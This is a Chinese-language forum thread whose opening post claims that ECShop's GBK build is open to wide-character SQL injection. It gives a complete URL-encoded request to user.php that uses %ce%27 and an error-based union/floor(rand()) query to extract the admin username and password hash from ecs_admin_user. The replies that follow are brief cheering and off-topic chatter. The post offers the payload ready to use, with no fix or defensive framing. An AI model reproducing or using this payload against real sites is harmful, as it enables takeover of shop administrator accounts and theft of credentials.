ecshop gbk存在宽字符注入漏洞

admin

ecshop 对宽字符过滤还是不完整。
提下以下参数：

http://www.xxx.com/user.php?act=is_registered&username=%ce%27%20and%201=1%20union%20select%201%20and%20%28select%201%20from%28select%20count%28*%29,concat%28%28Select%20concat%280x5b,user_name,0x3a,password,0x5d%29%20FROM%20ecs_admin_user%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20%23

测试报告


[/td][/tr]
[/table]

离子

回个帖子支持一下！

sdg375

楼上的稍等啦  

在不放过

不错不错,我喜欢看  

香水。

我十目一行也还是看不懂啊  

自行车才

顶你一下.  

战斗蜢

老大,我好崇拜你哟  

广州仔

昨晚多几分钟的准备，今天少几小时的麻烦。  

岳少

发贴看看自己积分  

夜枫再次登场

不对，就是碗是铁的，里边没饭你吃啥去？